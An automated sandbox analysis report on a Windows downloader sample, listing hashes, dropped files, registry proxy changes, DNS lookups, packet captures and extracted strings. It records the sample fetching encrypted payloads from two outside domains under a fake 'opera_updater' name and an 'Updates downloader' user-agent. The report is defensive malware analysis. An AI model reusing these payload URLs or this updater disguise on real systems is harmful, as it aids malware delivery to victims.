Analysis Date: 2014-10-04 17:34:43
MD5: 05c4965fefeb1b07cdd75b31cb101e83
SHA1: 4f484c6904ec466da8ef3ab0e6aa3a48e5fad722

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp: 2014-02-05 03:55:00
PEhash: 2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash: 7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bsitacademy.com
Winsock DNS: wahidexpress.com

Network Details:

DNS: bsitacademy.com
Type: A
107.150.48.43
DNS: wahidexpress.com
Type: A
103.15.74.65
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP: 192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         


Strings
l
\1.scr
C:\0935c70d2f45427c197e0151b2feaedf6b65af3348a990783a8843a069520a5e
C:\11adfb9c62a4f19ce264757c2bb91316664909b3cef856a81a63a65d9cf286ea
C:\2045ce337e937c708d78344b3a73933ce8d62fd7cb016040bb6f7c65fa074a54
C:\261b8e2deddfba981de3ff5c307d5076cec6b33b147a4fc09255e5e19c3ea692
C:\28xWCaRL.exe
C:\2c45bc39672433a96a11c5c86e55207ed09259f779f3df84fcd7e9ae55cc8728
C:\2e79a3a7e5b38fbe12579d90d427fb029484d3bba48c50c0ae7109eff22d6517
C:\2qtQmAn5.exe
C:\39e4e9857c7623f403bedbdbfbd40b6fd78ea07ae98926b737bb20737029ff90
C:\49ygiNC8.exe
C:\4bFHR_eK.exe
C:\4LdX714E.exe
C:\4OAw6dNj.exe
C:\544157fc725476a422d518dd25ea4cbba136c3669c626b5bcec9b1de41ce5142
C:\5VC1VUrH.exe
C:\6265da723bc26958a437280ab2bf573c1a392378cc6fe30d6c498fc8605a959c
C:\7DXO_kKe.exe
C:\7ef23be7ee3c45d18ed6cd1b23677632ef2e42f63cebe27f1c27b9d6ed0c8628
C:\863ca453ab0dc39767ec24aafe755cba8ff6add522119a4dbeb33e7d08fcf8c2
C:\8c709e64eca709a20ee4e39a845b733e4118d53779b10eeda51a681ddb63cc8b
C:\8_i9MBDI.exe
C:\9a18829238c15724a79c0cd33c3de8911635d141957005b6fb2ae4d2770580ba
C:\ab28758b74cc5675f49a548c52154000b3df4696d62df6bc65c04c4db7d89c8a
C:\bIDXh8fM.exe
C:\BiHfydDx.exe
C:\bQvawNZh.exe
C:\cA2pLGDD.exe
C:\CbeEZlk6.exe
C:\CsVsjqHo.exe
C:\da2fe0111340f8ddebb4512dd02b3540ed87a4acf33d54dfcb49dfb0b397ca12
C:\dc3c00d8199a5ff950d3fbb1142286b7253c837168e1f76ae5b61d05111be50a
C:\DDK8eifn.exe
C:\Documents and Settings\Administrator\
C:\DsIw8_vu.exe
C:\e4bBUPTs.exe
C:\E79XI7Ib.exe
C:\f81339b2a71f8daa9a19ba20f0a59d6398404076316034b58dc355ce4a97ef6e
C:\f825fa5e5b588bce7ed879e029ac5ac330eee918df3dbaf25ca18267c63a8513
C:\gOB71HTb.exe
C:\GvUWNgLZ.exe
C:\h8sWWftq.exe
C:\hf0wZtwC.exe
C:\htrn7av8.exe
C:\h_vxN2Bn.exe
C:\hxKbSwDB.exe
C:\ibc_qtSL.exe
C:\Iko1eocT.exe
C:\Jqcon9aK.exe
C:\lBibPqWU.exe
C:\LFCbmJ9C.exe
C:\mMu0FlJa.exe
C:\mNs9cELS.exe
C:\NCAxk4ZA.exe
C:\nN83i0W4.exe
C:\nudgZb0T.exe
C:\NV9ce7iU.exe
C:\NYX_Td72.exe
C:\O_9pR1Hk.exe
C:\oUIV5nLJ.exe
C:\RZADBAnk.exe
C:\selCqtGF.exe
C:\sLw8ojW6.exe
C:\SQW1o1Gg.exe
C:\T0dznn84.exe
C:\T23yFkiN.exe
C:\TiFb8UpM.exe
C:\uCdC5Tvc.exe
C:\UowVcj_v.exe
C:\UP39lnyH.exe
C:\uyOiqQak.exe
C:\VAu9PqqO.exe
C:\VmiOUex9.exe
C:\Wmy1CWZP.exe
C:\Wv6q4jxH.exe
C:\wWw5GZtE.exe
C:\Y_6HTADx.exe
C:\YUXIYElr.exe
C:\_yxYHN3a.exe
C:\ZtyyIqaE.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(